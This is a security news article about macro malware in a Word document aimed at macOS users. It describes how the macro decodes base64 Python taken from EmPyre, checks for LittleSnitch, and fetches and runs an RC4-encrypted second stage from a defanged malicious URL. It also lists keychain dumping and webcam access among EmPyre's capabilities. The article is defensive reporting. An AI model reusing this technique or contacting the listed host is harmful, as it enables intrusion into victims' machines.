Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Macro Malware Comes to macOS

After becoming a common occurrence on Windows-based computers over the past few years, Malware that abuses macro-enabled Microsoft Office documents to spread is now targeting macOS users too. 

After becoming a common occurrence on Windows-based computers over the past few years, Malware that abuses macro-enabled Microsoft Office documents to spread is now targeting macOS users too. 

Malicious macros in Office documents have been used to spread malware for over a decade, but their use dropped significantly after Microsoft disabled macros by default in Office 2007. A couple of years ago, however, the use of such macros recommenced, as cybercriminals started leveraging various social engineering techniques to trick users into enabling the macros.

Until now, only Windows users were targeted in such attacks, but it appears that actors building malware for Mac systems also decided to adopt the technique recently. According to Patrick Wardle, Director of Research at Synack, such an attack was recently carried out via a Word document named “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.docm.”

By using clamAV’s sigtool to extract embedded macros, the researcher stumbled upon Python code designed to perform a series of checks on the potential victim’s machine before it fetches and executes the malicious payload. As soon as the user opens the document in Word for Mac with macros enabled, the Fisher function is automatically executed.

The Fisher function was observed to decode a base64 chunk of data and then execute it via Python. The Python code, which appears to have been copied from the open-source EmPyre project, checks the machine to make sure LittleSnitch is not running, downloads the second-stage payload (from hxxps[:]//www.securitychecking.org:443/index[.]asp), then RC4 decrypts this payload and executes it.

While EmPyre is a known open-source multi-stage post-exploitation agent “built on cryptologically-secure communications,” it’s unknown what the second-stage payload included, as the file wasn’t available during analysis. While it might have been another EmPyre component, this payload could have been something entirely different as well.

“The second-stage component of Empyre is the persistent agent that affords a remote attacker continuing access to an infected host,” the researcher says. For persistence, cronjob, dylib hijack, launch daemon, or login hook are likely used.

“The persistent component of EmPyre can also be configured to run a wide range of EmPyre modules. These modules allow the attacker to perform a myriad of nefarious actions such as enabling the webcam, dumping the keychain, and accessing a user’s browser history,” the researcher notes.

Advertisement. Scroll to continue reading.

The IP associated with the securitychecking(.)org website that hosts the malicious payload appears to be geolocated in Russia and was previously associated with phishing.

While the malware used in this attack isn’t particularly advanced, as it relies on user interaction to open the malicious document in Microsoft Word and enable macros, it also uses an open-source implant that is likely to be easily detected. However, the use of social engineering is noteworthy, especially since it exploits the weakest link in the chain, namely the human element.

“And moreover, since macros are ‘legitimate’ functionality (vs. say a memory corruption vulnerability), the malware’s infection vector doesn’t have to worry about crashing the system nor being ‘patched’ out,” the researcher concludes.

Related: Mac OS Malware, Web-based Threats Decline: Report

Related: Site of BitTorrent App “Transmission” Again Used to Deliver OS X Malware

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Understand how to go beyond effectively communicating new security strategies and recommendations.

Register

Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Cyberwarfare

An engineer recruited by intelligence services reportedly used a water pump to deliver Stuxnet, which reportedly cost $1-2 billion to develop.

Malware & Threats

Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.